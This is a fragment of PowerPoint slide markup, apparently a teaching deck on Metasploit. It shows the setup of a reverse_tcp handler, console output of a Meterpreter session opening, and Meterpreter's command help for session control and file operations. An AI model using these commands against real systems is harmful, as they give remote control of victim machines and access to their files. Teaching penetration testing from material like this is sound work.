            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reverse_tcp</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exploit(handler) &gt; set LPORT 443</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LPORT =&gt; 443</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exploit(handler) &gt; set LHOST 192.168.1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LHOST =&gt; 192.168.1.1</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exploit(handler) &gt; exploit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Started reverse handler on 192.168.1.1:443</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Starting the payload handler...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Sending stage (748032 bytes)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Meterpreter session 2 opened (192.168.1.1:443 -&gt; 192.168.1.1:1120)</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22647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74734" y="530083"/>
            <a:ext cx="11986791" cy="6236477"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EE1B6B3-EEA8-91B7-7405-E060CBC5E42B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2224692" y="2481791"/>
            <a:ext cx="532646" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>fggh</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4159255C-8380-A9EC-A08E-E89FD3D4EBB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130475" y="530083"/>
            <a:ext cx="11597908" cy="6017032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Core Commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>=============</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    Command                   Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    -------                   -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    ?                         Help menu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    background                Backgrounds the current session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>bg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>                        Alias for background</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>bgkill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>                    Kills a background meterpreter script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>bglist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>                    Lists running background scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>bgrun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>                     Executes a meterpreter script as a background thread</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    channel                   Displays information or control active channels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    close                     Closes a channel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    detach                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Detach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> the meterpreter session (for http/https)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>disable_unicode_encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>  Disables encoding of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>unicode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>enable_unicode_encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>   Enables encoding of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>unicode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    exit                      Terminate the meterpreter session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>get_timeouts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>              Get the current session timeout values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>guid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>                      Get the session GUID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    help                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Help</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> menu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    info                      Displays information about a Post module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>irb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>                       Open an interactive Ruby shell on the current session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    load                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Load</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> one or more meterpreter extensions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>machine_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>                Get the MSF ID of the machine attached to the session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    migrate                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Migrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> the server to another process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    pivot                     Manage pivot listeners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    pry                       Open the Pry debugger on the current session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    quit                      Terminate the meterpreter session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    read                      Reads data from a channel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    resource                  Run the commands stored in a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    run                       Executes a meterpreter script or Post module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    secure                    (Re)Negotiate TLV packet encryption on the session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    sessions                  Quickly switch to another session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>set_timeouts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>              Set the current session timeout values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ar-EG" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304100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74734" y="530083"/>
            <a:ext cx="11986791" cy="6236477"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EE1B6B3-EEA8-91B7-7405-E060CBC5E42B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2224692" y="2481791"/>
            <a:ext cx="532646" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>fggh</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4159255C-8380-A9EC-A08E-E89FD3D4EBB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130475" y="530083"/>
            <a:ext cx="11597908" cy="1954381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Core Commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>=============</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    Command                   Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    -------                   -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    sleep                     Force Meterpreter to go quiet, then re-establish session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>ssl_verify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>                Modify the SSL certificate verification setting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    transport                 Manage the transport mechanisms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    use                       Deprecated alias for "load"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>uuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>                      Get the UUID for the current session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    write                     Writes data to a channel</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220557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E98D8E-7833-A149-A6A9-3D1454FCEEBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="863221" y="58143"/>
            <a:ext cx="10515600" cy="7325296"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HOW IT RUN ….</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4087288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104662" y="522688"/>
            <a:ext cx="11986791" cy="6236477"/>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4159255C-8380-A9EC-A08E-E89FD3D4EBB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104662" y="629932"/>
            <a:ext cx="11597908" cy="5001369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>tdapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>: File system Commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>============================</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    Command       Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    -------       -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    cat           Read the contents of a file to the screen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    cd            Change directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    checksum      Retrieve the checksum of a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    cp            Copy source to destination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    del           Delete the specified file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>           List files (alias for ls)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    download      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> a file or directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    edit          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Edit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>getlwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>        Print local working directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>getwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>         Print working directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>lcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>          Read the contents of a local file to the screen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    lcd           Change local working directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>lls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>           List local files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>lpwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>          Print local working directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    ls            List files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>         Make directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    mv            Move source to destination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>           Print working directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    rm            Delete the specified file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>rmdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>         Remove directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    search        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> for files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>show_mount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    List all mount points/logical drives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    upload        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> a file or directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ar-EG" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263895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74734" y="530083"/>
            <a:ext cx="11986791" cy="6236477"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81E865A0-A825-E87F-FCEB-69DB90A95F84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130475" y="582067"/>
            <a:ext cx="7652085" cy="2846933"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
